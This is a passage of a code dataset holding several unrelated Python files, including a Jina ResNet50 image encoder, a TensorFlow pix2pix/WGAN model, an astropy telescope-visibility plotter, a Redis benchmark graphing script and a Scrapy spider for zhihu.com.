'float32'\n\n def _preprocess(self, blob) -> np.ndarray:\n \n _img = Image.fromarray(blob)\n\n if self.enable_rescale:\n _img = _img.resize((self.rescale_width, self.rescale_height))\n\n _img_blob = np.asarray(_img)\n \n # if self.enable_normalization:\n # _img_blob = (_img_blob / 255).astype(self.type)\n # _img_blob = _img_blob.astype('float32')\n \n _img_blob = preprocess_input(_img_blob) # ResNet50 preprocess_input\n\n\n return _img_blob\n \n @requests\n def process_img(self, docs: DocumentArray, parameters: dict = None, **kwargs):\n docs = DocumentArray(list(filter(lambda doc: doc.modality=='image', docs)))\n\n # Filter image mode which is not 'RGB'\n modes, _ = docs.get_attributes_with_docs('tags__mode')\n s_modes = set(modes)\n if len(s_modes) > 1:\n for each_mode in s_modes:\n if each_mode != 'RGB':\n found_index = np.where(np.array(modes) == each_mode)[0]\n for i in found_index:\n self.logger.warning(f\"Unsupported image mode: {each_mode}; image: '{docs[int(i)].tags__path}'\")\n docs = DocumentArray(list(filter(lambda doc: doc.tags__mode=='RGB', docs)))\n\n # Process data\n for doc in docs:\n \n doc.blob = self._preprocess(doc.blob)\n\n return docs\n\nclass TfModelEncoder(Executor):\n def __init__(self, **kwargs):\n super().__init__()\n self.image_dim = 224\n self.model = ResNet50(pooling='max', \n input_shape=(self.image_dim, self.image_dim, 3),\n weights='imagenet')\n\n # def _resize_images(self, tensors):\n # resized_tensors = []\n # for t in tensors:\n # try:\n # resized_tensors.append(tf.keras.preprocessing.image.smart_resize(t, (self.image_dim, self.image_dim)))\n # except InvalidArgumentError:\n # # this can happen if you include empty or other malformed images\n # pass\n # return resized_tensors\n\n @requests\n def encode(self, docs, **kwargs):\n\n blobs, _ = docs.get_attributes_with_docs('blob')\n\n # buffers, docs = docs.get_attributes_with_docs('buffer')\n # tensors = [tf.io.decode_image(contents=b, channels=3) for b in buffers]\n # resized_tensors = preprocess_input(np.array(self._resize_images(tensors)))\n \n embeds = self.model.predict(np.stack(blobs))\n for d, b in zip(docs, embeds):\n d.embedding = b\n","repo_name":"RedCarpG/JINA-image_similarity_search-example","sub_path":"executors/image_encoder.py","file_name":"image_encoder.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22003496681","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nproducts = {\n 'candy': 10,\n 'juice': 5,\n 'pen': 50\n}\n\ndef check(product,num):\n if product in products.keys() and products[product] >= num:\n return True\n return False\n\n","repo_name":"manehharutyunyan/python-homeworks","sub_path":"HW02/Problem4/Productcheck.py","file_name":"Productcheck.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6096867502","text":"programmer = {\n \"name\": \"Alice\",\n \"position\": \"Fullstack Developer\",\n \"skills\": [\"Python\", \"Git\", \"SQL\", \"HTML\", \"CSS\", \"Javascript\"]\n}\n\n# Por defecto itera sobre las llaves, pero podria ser cualquier nombre: eje attr\nfor key in programmer:\n print(key)\n\n# Podriamos imprimir los valores\nfor key in programmer:\n print(programmer[key]) \n\nfor key, value in programmer.items():\n print(key, \":\",value) ","repo_name":"karenqueca9/lists_and_dicts","sub_path":"dictionaries/09.looping_dicts.py","file_name":"09.looping_dicts.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24919125678","text":"import collections\r\nfrom utils.functions import *\r\n\r\n\r\ndef generator_deconv(generator_inputs, generator_outputs_channels, a):\r\n encoder1 = conv(generator_inputs, a.ngf, stride=2, n=1)\r\n act1 = lrelu(encoder1, a.leak)\r\n encoder2 = conv(act1, a.ngf * 2, stride=2, n=2)\r\n encoder2 = batchnorm(encoder2, n=2)\r\n act2 = lrelu(encoder2, a.leak)\r\n encoder3 = conv(act2, a.ngf * 4, stride=2, n=3)\r\n encoder3 = batchnorm(encoder3, n=3)\r\n act3 = lrelu(encoder3, a.leak)\r\n encoder4 = conv(act3, a.ngf * 8, stride=2, n=4)\r\n encoder4 = batchnorm(encoder4, n=4)\r\n act4 = lrelu(encoder4, a.leak)\r\n encoder5 = conv(act4, a.ngf * 8, stride=2, n=5)\r\n encoder5 = batchnorm(encoder5, n=5)\r\n act5 = lrelu(encoder5, a.leak)\r\n encoder6 = conv(act5, a.ngf * 8, stride=2, n=6)\r\n encoder6 = batchnorm(encoder6, n=6)\r\n act6 = lrelu(encoder6, a.leak)\r\n encoder7 = conv(act6, a.ngf * 8, stride=2, n=7)\r\n encoder7 = batchnorm(encoder7, n=7)\r\n act7 = lrelu(encoder7, a.leak)\r\n encoder8 = conv(act7, a.ngf * 8, stride=2, n=8)\r\n encoder8 = batchnorm(encoder8, n=8)\r\n act8 = lrelu(encoder8, a.leak)\r\n decoder8 = deconv(act8, a.ngf * 8, n=8)\r\n decoder8 = batchnorm(decoder8, n=9)\r\n decoder8 = tf.nn.dropout(decoder8, keep_prob=0.5)\r\n act9 = lrelu(tf.concat([decoder8, encoder7], axis=3), a.leak)\r\n decoder7 = deconv(act9, a.ngf * 8, n=7)\r\n decoder7 = batchnorm(decoder7, n=10)\r\n decoder7 = tf.nn.dropout(decoder7, keep_prob=0.5)\r\n act10 = lrelu(tf.concat([decoder7, encoder6], axis=3), a.leak)\r\n decoder6 = deconv(act10, a.ngf * 8, n=6)\r\n decoder6 = batchnorm(decoder6, n=11)\r\n decoder6 = tf.nn.dropout(decoder6, keep_prob=0.5)\r\n act11 = lrelu(tf.concat([decoder6, encoder5], axis=3), a.leak)\r\n decoder5 = deconv(act11, a.ngf * 8, n=5)\r\n decoder5 = batchnorm(decoder5, n=12)\r\n act12 = lrelu(tf.concat([decoder5, encoder4], axis=3), a.leak)\r\n decoder4 = deconv(act12, a.ngf * 4, n=4)\r\n decoder4 = batchnorm(decoder4, n=13)\r\n act13 = lrelu(tf.concat([decoder4, encoder3], axis=3), a.leak)\r\n decoder3 = deconv(act13, a.ngf * 2, n=3)\r\n decoder3 = batchnorm(decoder3, n=14)\r\n act14 = lrelu(tf.concat([decoder3, encoder2], axis=3), a.leak)\r\n decoder2 = deconv(act14, a.ngf, n=2)\r\n decoder2 = batchnorm(decoder2, n=15)\r\n act15 = tf.nn.relu(tf.concat([decoder2, encoder1], axis=3))\r\n decoder1 = deconv(act15, generator_outputs_channels, n=1)\r\n act16 = tf.tanh(decoder1)\r\n return act16\r\n\r\n\r\ndef generator_upsampling(generator_inputs, generator_outputs_channels, a):\r\n encoder1 = conv(generator_inputs, a.ngf, stride=2, n=1)\r\n act1 = lrelu(encoder1, a.leak)\r\n encoder2 = conv(act1, a.ngf * 2, stride=2, n=2)\r\n encoder2 = batchnorm(encoder2, n=2)\r\n act2 = lrelu(encoder2, a.leak)\r\n encoder3 = conv(act2, a.ngf * 4, stride=2, n=3)\r\n encoder3 = batchnorm(encoder3, n=3)\r\n act3 = lrelu(encoder3, a.leak)\r\n encoder4 = conv(act3, a.ngf * 8, stride=2, n=4)\r\n encoder4 = batchnorm(encoder4, n=4)\r\n act4 = lrelu(encoder4, a.leak)\r\n encoder5 = conv(act4, a.ngf * 8, stride=2, n=5)\r\n encoder5 = batchnorm(encoder5, n=5)\r\n act5 = lrelu(encoder5, a.leak)\r\n encoder6 = conv(act5, a.ngf * 8, stride=2, n=6)\r\n encoder6 = batchnorm(encoder6, n=6)\r\n act6 = lrelu(encoder6, a.leak)\r\n encoder7 = conv(act6, a.ngf * 8, stride=2, n=7)\r\n encoder7 = batchnorm(encoder7, n=7)\r\n act7 = lrelu(encoder7, a.leak)\r\n encoder8 = conv(act7, a.ngf * 8, stride=2, n=8)\r\n encoder8 = batchnorm(encoder8, n=8)\r\n act8 = lrelu(encoder8, a.leak)\r\n decoder8 = upsampling(act8, a.ngf * 8, n=8)\r\n decoder8 = batchnorm(decoder8, n=9)\r\n decoder8 = tf.nn.dropout(decoder8, keep_prob=0.5)\r\n act9 = lrelu(tf.concat([decoder8, encoder7], axis=3), a.leak)\r\n decoder7 = upsampling(act9, a.ngf * 8, n=7)\r\n decoder7 = batchnorm(decoder7, n=10)\r\n decoder7 = tf.nn.dropout(decoder7, keep_prob=0.5)\r\n act10 = lrelu(tf.concat([decoder7, encoder6], axis=3), a.leak)\r\n decoder6 = upsampling(act10, a.ngf * 8, n=6)\r\n decoder6 = batchnorm(decoder6, n=11)\r\n decoder6 = tf.nn.dropout(decoder6, keep_prob=0.5)\r\n act11 = lrelu(tf.concat([decoder6, encoder5], axis=3), a.leak)\r\n decoder5 = upsampling(act11, a.ngf * 8, n=5)\r\n decoder5 = batchnorm(decoder5, n=12)\r\n act12 = lrelu(tf.concat([decoder5, encoder4], axis=3), a.leak)\r\n decoder4 = upsampling(act12, a.ngf * 4, n=4)\r\n decoder4 = batchnorm(decoder4, n=13)\r\n act13 = lrelu(tf.concat([decoder4, encoder3], axis=3), a.leak)\r\n decoder3 = upsampling(act13, a.ngf * 2, n=3)\r\n act14 = lrelu(tf.concat([decoder3, encoder2], axis=3), a.leak)\r\n decoder2 = upsampling(act14, a.ngf, n=2)\r\n decoder2 = batchnorm(decoder2, n=15)\r\n act15 = tf.nn.relu(tf.concat([decoder2, encoder1], axis=3))\r\n decoder1 = upsampling(act15, generator_outputs_channels, n=1)\r\n act16 = tf.tanh(decoder1)\r\n return act16\r\n\r\n\r\ndef generator(generator_inputs, generator_outputs_channels, a):\r\n if a.upsampling:\r\n return generator_upsampling(generator_inputs, generator_outputs_channels, a)\r\n else:\r\n return generator_deconv(generator_inputs, generator_outputs_channels, a)\r\n\r\n\r\ndef discriminator(disc_inputs, disc_targets, a):\r\n pair = tf.concat([disc_inputs, disc_targets], axis=3)\r\n encoder1 = conv(pair, a.ndf, stride=2, n=1)\r\n act1 = lrelu(encoder1, a.leak)\r\n encoder2 = conv(act1, a.ndf * 2, stride=2, n=2)\r\n encoder2 = batchnorm(encoder2, n=2)\r\n act2 = lrelu(encoder2, a.leak)\r\n encoder3 = conv(act2, a.ndf * 4, stride=2, n=3)\r\n encoder3 = batchnorm(encoder3, n=3)\r\n act3 = lrelu(encoder3, a.leak)\r\n encoder4 = conv(act3, a.ndf * 8, stride=1, n=4)\r\n encoder4 = batchnorm(encoder4, n=4)\r\n act4 = lrelu(encoder4, a.leak)\r\n encoder5 = conv(act4, 1, stride=1, n=5)\r\n act5 = tf.sigmoid(encoder5)\r\n return act5\r\n\r\n\r\ndef create_model(inputs, targets, net1, net2, a):\r\n\r\n with tf.variable_scope(\"generator\"):\r\n out_channels = int(targets.get_shape()[-1])\r\n outputs = generator(inputs, out_channels, a)\r\n\r\n # create two copies of discriminator, one for real pairs and one for fake pairs\r\n # they share the same underlying variables\r\n with tf.name_scope(\"real_discriminator\"):\r\n with tf.variable_scope(\"discriminator\"):\r\n # 2x [batch, height, width, channels] => [batch, 30, 30, 1]\r\n predict_real = discriminator(inputs, targets, a)\r\n\r\n with tf.name_scope(\"fake_discriminator\"):\r\n with tf.variable_scope(\"discriminator\", reuse=True):\r\n # 2x [batch, height, width, channels] => [batch, 30, 30, 1]\r\n predict_fake = discriminator(inputs, outputs, a)\r\n\r\n with tf.name_scope(\"discriminator_loss\"):\r\n # minimizing -tf.log will try to get inputs to 1\r\n # predict_real => 1\r\n # predict_fake => 0\r\n disc_loss = tf.reduce_mean(predict_fake - predict_real)\r\n\r\n with tf.name_scope(\"generator_loss\"):\r\n # predict_fake => 1\r\n # abs(targets - outputs) => 0\r\n gen_loss_GAN = -tf.reduce_mean(predict_fake)\r\n gen_loss_L1 = tf.reduce_mean(tf.abs(targets - outputs))\r\n gen_loss_tv = tf.reduce_mean(tf.sqrt(tf.nn.l2_loss(sum_tv_loss(outputs))))\r\n gen_loss_f = tf.reduce_mean(tf.sqrt(tf.nn.l2_loss(feature_loss(targets, net1) - feature_loss(outputs, net2))))\r\n gen_loss = gen_loss_GAN * a.gan_weight + gen_loss_L1 * a.l1_weight + gen_loss_tv * a.tv_weight + gen_loss_f * a.f_weight\r\n\r\n with tf.name_scope(\"discriminator_train\"):\r\n disc_tvars = [var for var in tf.trainable_variables() if var.name.startswith(\"discriminator\")]\r\n disc_optimizer = tf.train.RMSPropOptimizer(a.lr, a.beta1)\r\n disc_grads_and_vars = disc_optimizer.compute_gradients(disc_loss, var_list=disc_tvars)\r\n disc_train = disc_optimizer.apply_gradients(disc_grads_and_vars)\r\n clip_vars = [tf.assign(var, tf.clip_by_value(var, -0.02, 0.02)) for var in disc_tvars]\r\n tuple_vars = tf.tuple(clip_vars, control_inputs=[disc_train])\r\n\r\n with tf.name_scope(\"generator_train\"):\r\n with tf.control_dependencies(tuple_vars):\r\n gen_tvars = [var for var in tf.trainable_variables() if var.name.startswith(\"generator\")]\r\n gen_optim = tf.train.RMSPropOptimizer(a.lr, a.beta1)\r\n gen_grads_and_vars = gen_optim.compute_gradients(gen_loss, var_list=gen_tvars)\r\n gen_train = gen_optim.apply_gradients(gen_grads_and_vars)\r\n\r\n ema = tf.train.ExponentialMovingAverage(decay=0.99)\r\n update_losses = ema.apply([disc_loss, gen_loss_GAN, gen_loss_L1, gen_loss_tv, gen_loss_f])\r\n\r\n global_step = tf.train.get_or_create_global_step()\r\n incr_global_step = tf.assign(global_step, global_step + 1)\r\n\r\n return collections.namedtuple(\"Model\", \"predict_real, predict_fake, \"\r\n \"disc_loss, disc_grads_and_vars, \"\r\n \"gen_loss_GAN, gen_loss_tv, gen_loss_f, gen_loss_L1, gen_grads_and_vars, \"\r\n \"outputs, train\")(\r\n predict_real=predict_real,\r\n predict_fake=predict_fake,\r\n disc_loss=ema.average(disc_loss),\r\n disc_grads_and_vars=disc_grads_and_vars,\r\n gen_loss_GAN=ema.average(gen_loss_GAN),\r\n gen_loss_L1=ema.average(gen_loss_L1),\r\n gen_loss_tv=ema.average(gen_loss_tv),\r\n gen_loss_f=ema.average(gen_loss_f),\r\n gen_grads_and_vars=gen_grads_and_vars,\r\n outputs=outputs,\r\n train=tf.group(update_losses, incr_global_step, gen_train),\r\n )\r\n","repo_name":"irfanICMLL/CoupleGenerator","sub_path":"models/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":9600,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"54"} +{"seq_id":"37753279838","text":"#!/usr/bin/env python3\n\n\n# +\n# import(s)\n# -\nfrom astropy.coordinates import get_moon, get_sun, SkyCoord, EarthLocation, AltAz\nfrom astropy.time import Time\nfrom astropy.utils import iers\nfrom astropy.visualization import astropy_mpl_style\nfrom datetime import datetime, timedelta\n\nimport argparse\nimport astropy.units as u\nimport functools\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport re\nimport warnings\n\n\n# +\n# initialize\n# -\nwarnings.filterwarnings('ignore')\nplt.style.use(astropy_mpl_style)\n\n\n# +\n# function(s)\n# -\ndef get_time(_offset=0):\n return (datetime.now() + timedelta(days=_offset)).isoformat()\n\n\ndef get_utc(_offset=0):\n return (datetime.utcnow() + timedelta(days=_offset)).isoformat()\n\n\ndef utc_to_mjd(_iso=''):\n # noinspection PyBroadException\n try:\n return float(Time(_iso).mjd)\n except Exception:\n return float(math.nan)\n\n\ndef mjd_to_utc(_mjd=0.0):\n # noinspection PyBroadException\n try:\n return Time(_mjd+2400000.5, format='jd', precision=3).isot\n except Exception:\n return None\n\n\ndef time2string(_delta=0.0):\n if not isinstance(_delta, float) or _delta < 0.0:\n return ''\n _limit = [_v for _v in TIME_VALUES if _v <= _delta]\n if _limit:\n _limit = _limit[0]\n else:\n _limit = 1.0\n return f\"{_delta/_limit:.2f} {TIME_SYMBOLS[TIME_VALUES.index(_limit)]}\"\n\n\ndef timeit(func):\n @functools.wraps(func)\n def wrapper(*args_in, **kwargs_in):\n _ts = float(utc_to_mjd(get_utc()))\n print(f'Calling {func.__name__}()')\n try:\n _res = func(*args_in, **kwargs_in)\n except Exception as _e:\n print(f'Failed {func.__name__}(), e={_e}')\n return None\n else:\n print(f'Called {func.__name__}() OK')\n _delta = (float(utc_to_mjd(get_utc())) - _ts) * 86400.0\n print(f' {func.__name__}() took {time2string(_delta)}')\n return _res\n return wrapper\n\n\n# +\n# constant(s)\n# -\nCAT_FILE = 'finals2000A'\nCAT_DATE = utc_to_mjd(get_utc())\niers.IERS_A_URL = 'ftp://cddis.gsfc.nasa.gov/pub/products/iers/{CAT_FILE}.all'\nKUIPER_ALTITUDE = 2510.028\nKUIPER_LATITUDE = 32.4165\nKUIPER_LONGITUDE = -110.7345\nKUIPER = EarthLocation(lat=KUIPER_LATITUDE*u.deg, lon=KUIPER_LONGITUDE*u.deg, height=KUIPER_ALTITUDE*u.m)\nPLOT_TYPES = ['Airmass', 'Night']\nTIME_SYMBOLS = (u's', u'ms', u'\\u00B5s', u'ns', u'ps', u'fs', u'as', u'zs', u'ys')\nTIME_VALUES = tuple([math.pow(10, -3*i) for i in range(len(TIME_SYMBOLS))])\nUTC_FORMAT = re.compile(r'\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}.\\d{3}')\n\n\n# +\n# update catalog\n# -\n# _cat_file = os.path.abspath(os.path.expanduser(f\"{os.getenv('HOME')}/.{CAT_FILE}.dat\"))\n# _cat_date = CAT_DATE\n# if os.path.exists(_cat_file):\n# with open(_cat_file, 'r') as _fr:\n# _cat_date = float(_fr.read())\n# print(f\"_cat_date = {_cat_date}\")\n# print(f\"CAT_DATE = {CAT_DATE}\")\n#\n# if (float(CAT_DATE) - float(_cat_date)) > 7.0:\n# try:\n# # iers.IERS_A_URL = 'ftp://cddis.gsfc.nasa.gov/pub/products/iers/{CAT_FILE}.all'\n# astroplan.download_IERS_A()\n# except Exception:\n# print(f\"Failed to update {_cat_file}\")\n# try:\n# print(f\"Updating {_cat_date}\")\n# os.remove(_cat_file)\n# with open(_cat_file, 'w') as _fw:\n# _fw.write(f\"{CAT_DATE}\\n\")\n# except Exception:\n# pass\n\n\n# +\n# time some thing(s)\n# -\n@timeit\ndef _time_wrapper(_utc=''):\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n return None\n return Time(f'{_utc}')\n\n\n@timeit\ndef _midnight_wrapper(_utc=''):\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n return None\n return mjd_to_utc(math.floor(utc_to_mjd(_utc) + 1.0))\n\n\n@timeit\ndef _coords_wrapper(_name=''):\n if not isinstance(_name, str) or _name.strip() == '':\n return None\n return SkyCoord.from_name(f'{_name}')\n\n\n@timeit\ndef _altaz_wrapper(_target=None, _time=None):\n if _target is None or _time is None:\n return None\n return _target.transform_to(AltAz(obstime=_time, location=KUIPER))\n\n\n@timeit\ndef _d_array_wrapper():\n # noinspection PyUnresolvedReferences\n return np.linspace(-12, 12, 400)*u.hour\n\n\n@timeit\ndef _d_times_wrapper(_midnight=None, _d_array=None):\n return Time(_midnight)+_d_array\n\n\n@timeit\ndef _d_frame_wrapper(_d_times=None, _location=None):\n return AltAz(obstime=_d_times, location=_location)\n\n\n@timeit\ndef _d_sun_wrapper(_d_times=None, _d_frame=None):\n return get_sun(_d_times).transform_to(_d_frame)\n\n\n@timeit\ndef _d_moon_wrapper(_d_times=None, _d_frame=None):\n return get_moon(_d_times).transform_to(_d_frame)\n\n\n@timeit\ndef _d_altazs_wrapper(_target=None, _d_frame=None):\n return _target.transform_to(_d_frame)\n\n\n# +\n# function: plot()\n# -\ndef plot(_name='', _plot='', _utc='', _verbose=True):\n\n # check input(s)\n if not isinstance(_name, str) or _name.strip() == '':\n raise Exception(f'Invalid argument, _name={_name}')\n if not isinstance(_plot, str) or _plot.lower() not in [_x.lower() for _x in PLOT_TYPES]:\n raise Exception(f'Invalid argument, _plot={_plot}')\n if not isinstance(_utc, str) or re.match(UTC_FORMAT, _utc) is None:\n raise Exception(f'Invalid argument, _utc={_utc}')\n _verbose = _verbose if isinstance(_verbose, bool) else False\n\n # convert (with timing)\n _time = _time_wrapper(f'{_utc}')\n _midnight = _midnight_wrapper(f'{_utc}')\n _target = _coords_wrapper(f'{_name}')\n _target_altaz = _altaz_wrapper(_target, _time)\n\n # select plot\n if _plot.lower() == 'airmass':\n\n try:\n # calculate\n # noinspection PyUnresolvedReferences\n _m_array = np.linspace(-2, 10, 100)*u.hour\n _m_times = Time(_midnight)+_m_array\n _m_frame = AltAz(obstime=_m_times, location=KUIPER)\n _m_altazs = _target.transform_to(_m_frame)\n _m_airmass = _m_altazs.secz\n if _verbose:\n print(f\"_m_array = {_m_array}\")\n print(f\"_m_times = {_m_times}\")\n print(f\"_m_frame = {_m_frame}\")\n print(f\"_m_altazs = {_m_altazs}\")\n print(f\"_m_airmass = {_m_airmass}\")\n\n # plot\n plt.plot(_m_array, _m_airmass)\n plt.xlim(-2, 10)\n plt.ylim(1, 4)\n plt.xlabel('Hours from Midnight')\n plt.ylabel('Airmass [Sec(z)]')\n plt.show()\n except Exception:\n raise Exception(f'Invalid airmass plot, _name={_name}')\n\n elif _plot.lower() == 'night':\n\n try:\n # calculate\n # _d_array = np.linspace(-12, 12, 400)*u.hour\n _d_array = _d_array_wrapper()\n\n # _d_times = Time(_midnight)+_d_array\n _d_times = _d_times_wrapper(_midnight, _d_array)\n\n # _d_frame = AltAz(obstime=_d_times, location=KUIPER)\n _d_frame = _d_frame_wrapper(_d_times, KUIPER)\n\n # _d_sun = get_sun(_d_times).transform_to(_d_frame)\n _d_sun = _d_sun_wrapper(_d_times, _d_frame)\n\n # _d_moon = get_moon(_d_times).transform_to(_d_frame)\n _d_moon = _d_moon_wrapper(_d_times, _d_frame)\n\n # _d_altazs = _target.transform_to(_d_frame)\n _d_altazs = _d_altazs_wrapper(_target, _d_frame)\n\n # if _verbose:\n # print(f\"_d_array = {_d_array}\")\n # print(f\"_d_times = {_d_times}\")\n # print(f\"_d_frame = {_d_frame}\")\n # print(f\"_d_sun = {_d_sun}\")\n # print(f\"_d_moon = {_d_moon}\")\n # print(f\"_d_altazs = {_d_altazs}\")\n\n # plot\n plt.plot(_d_array, _d_sun.alt, color='r', label='Sun')\n plt.plot(_d_array, _d_moon.alt, color=[0.75]*3, ls='--', label='Moon')\n plt.scatter(_d_array, _d_altazs.alt, c=_d_altazs.az, label=f'{_name}', lw=0, s=8, cmap='viridis')\n plt.fill_between(_d_array.to('hr').value, 0, 90, _d_sun.alt < -0*u.deg, color='0.5', zorder=0)\n plt.fill_between(_d_array.to('hr').value, 0, 90, _d_sun.alt < -18*u.deg, color='k', zorder=0)\n plt.colorbar().set_label('Azimuth [deg]')\n plt.legend(loc='upper left')\n plt.xlim(-12, 12)\n plt.xticks(np.arange(13)*2 - 12)\n plt.ylim(0, 90)\n plt.xlabel('Hours from Midnight')\n plt.ylabel('Altitude [deg]')\n plt.show()\n except Exception:\n raise Exception(f'Invalid night plot, _name={_name}')\n\n\n# +\n# main()\n# -\nif __name__ == '__main__':\n\n # get command line argument(s)\n _p = argparse.ArgumentParser(description=f'Read Database File', formatter_class=argparse.RawTextHelpFormatter)\n _p.add_argument(f'--name', default='M33', help=\"\"\"Object name, default=%(default)s\"\"\")\n _p.add_argument(f'--plot', default=PLOT_TYPES[1], help=f\"\"\"Plot type, default=%(default)s, one of {PLOT_TYPES}\"\"\")\n _p.add_argument(f'--utc', default=get_utc(), help=\"\"\"UTC date/time, default=%(default)s\"\"\")\n _p.add_argument(f'--verbose', default=False, action='store_true', help=f'if present, produce more verbose output')\n args = _p.parse_args()\n plot(_name=args.name, _plot=args.plot, _utc=args.utc, _verbose=bool(args.verbose))\n","repo_name":"pndaly/ARTN-ORP","sub_path":"utils/plot_kuiper.py","file_name":"plot_kuiper.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43966402487","text":"from data.data_loader import get_data_loader\nfrom models.models import create_model\nfrom option_parser import TestingOptionParser\nimport torchvision.utils as vutils\nimport numpy as np\nimport torch\nimport os\n\nparser = TestingOptionParser()\nopt = parser.parse_args()\nopt.batch_size = opt.repeat_generation\nopt.gpu_ids = []\n\ndata_loader = get_data_loader(opt)\n\nmodel = create_model(opt)\ntotal_steps = 0\nmodel.load(opt.epoch)\nTensor = torch.cuda.FloatTensor if opt.gpu_ids else torch.FloatTensor\nsingle_input = Tensor(\n 1,\n opt.input_channel,\n opt.height,\n opt.width\n)\nrepeated_input = Tensor(\n opt.batch_size,\n opt.input_channel,\n opt.height,\n opt.width\n)\n\nfor i, data in enumerate(data_loader):\n print(i)\n test_dir = os.path.join(opt.test_dir, opt.model)\n if i >= opt.test_count:\n break\n # cifar_dir = '/home/lzh/cifar'\n # misc.imsave(cifar_dir + '/' + 'real_{}.png'.format(i), np.transpose(data[0][0].numpy(), [1, 2, 0]))\n single_input.copy_(\n data[0][0].view(\n 1,\n opt.input_channel,\n opt.height,\n opt.width\n )\n )\n repeated_input.copy_(\n single_input.repeat(opt.batch_size, 1, 1, 1)\n )\n\n model.set_input(repeated_input)\n model.test()\n\n visuals = model.get_visuals(sample_single_image=False)\n for j in range(opt.batch_size):\n save_path = test_dir+'/fake_%d.png' % (i*100+j)\n vutils.save_image(visuals.data[j], save_path)\n #misc.imsave(test_dir + '/' + 'fake_{}_{}.png'.format(i, j), np_image)\n","repo_name":"hhqweasd/RGNet","sub_path":"test_50k.py","file_name":"test_50k.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29352902107","text":"import progbg as sb\nimport progbg.graphing as g\nimport progbg.formatters as f\nimport os\nimport re\n\nROOT_DIR=os.environ[\"OUT\"]\nMODE=os.environ[\"MODE\"]\nHOSTS=os.environ[\"EXTERNAL_HOSTS\"].split()\n\nif MODE == \"VM\":\n fs = [\"100\", \"200\", \"300\", \"400\", \"500\", \"600\", \"700\", \"800\", \"900\", \"1000\"]\nelse:\n fs = [\"10\", \"20\", \"30\", \"40\", \"50\", \"60\", \"70\", \"80\", \"90\", \"100\"]\n\ndef get_num(val):\n try:\n return float(val)\n except:\n for i, x in enumerate(val):\n if x.isnumeric() or x == \".\":\n continue\n break\n\n return float(val[:i])\n\ndef parse_redis(metrics, path):\n pattern = re.compile(\"Throughput\")\n result = None\n throughputs = []\n with open(path) as f:\n for line in f:\n line = str(line.encode('UTF-8'))\n if \"Throughput\" in line:\n t = get_num(line.split()[-1])\n if t == 0:\n break\n throughputs.append(t)\n if \"Connection refused\" in line:\n print(\"Connection refused error!\")\n break\n if len(throughputs) != len(HOSTS):\n print(\"[Error] {} did not execute or pre-emptively shut down, please re-run fig4a.sh\".format(path))\n os.unlink(path)\n else:\n metrics.add_metric(\"throughput\", sum(throughputs))\n\nbase_path = os.path.join(ROOT_DIR, \"redis\")\nconst_base = os.path.join(base_path, \"base\")\nbase = sb.plan_parse(const_base, const_base, parse_redis)\n\nexecs = []\nfor x in fs:\n freq_path = os.path.join(base_path, x)\n execs.append(sb.plan_parse(freq_path, freq_path, parse_redis))\n\n\nx=[ int(x) for x in fs ]\nl1 = g.Line(execs, \"throughput\", x=x, label=\"With Aurora\")\nl2 = g.ConstLine(base, \"Base\", \"throughput\")\nfig4a = sb.plan_graph(g.LineGraph([l1, l2], std=True,\n out=\"fig4a.svg\",\n formatters=[ \n f.set_size(10, 5),\n f.set_yrange(0, None),\n f.yaxis_formatter(label=\"Operations per second\"),\n f.xaxis_formatter(\"Checkpoint Period\"),\n f.set_title(\"Redis with Aurora\"),\n ]\n))\n","repo_name":"rcslab/aurora-bench","sub_path":"artifact_evaluation/graphing/fig4a.py","file_name":"fig4a.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38315976659","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\nfrom scrapy.selector import Selector\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.http import Request,FormRequest\n\n# import scrapy\nfrom zhihu.items import ZhihuItem\nfrom zhihu.settings import *\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass ZhihuSpider(scrapy.Spider):\n name = \"zhihu\"\n allowed_domains = [\"zhihu.com\"]\n start_urls = [\n \"https://www.zhihu.com/#signin\"\n ]\n\n rules = (\n Rule(LinkExtractor(allow=('/question/\\d+#answer-\\d+')), callback='parse_item', follow=True),\n Rule(LinkExtractor(allow=('/question/\\d+')), callback='parse_item', follow=True)\n )\n\n def __init__(self):\n self.headers=HEADER\n self.cookies=COOKIES\n\n def start_requests(self):\n for i, url in enumerate(self.start_urls):\n yield FormRequest(\n url, meta = {'cookiejar': i},\n headers=self.headers,\n cookies=self.cookies,\n callback=self.parse_item)\n\n def parse_item(self, response):\n # print response.body\n selector = Selector(response)\n\n # print 'Start extract data from response ..............'\n items = []\n for elem in selector.xpath('//div[@class=\"feed-content\"]/h2[@class=\"feed-title\"]'):\n item = ZhihuItem()\n item['title'] = elem.xpath('a/text()').extract()\n item['link'] = elem.xpath('a/@href').extract()\n items.append(item)\n\n print(item['title'].decode())\n print(item['link'].decode())\n # print 'Finish extract data........................'\n return items\n","repo_name":"zhushh/PythonCode","sub_path":"scrapy/zhihu/zhihu/spiders/zhihu_spider.py","file_name":"zhihu_spider.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34342443292","text":"T = 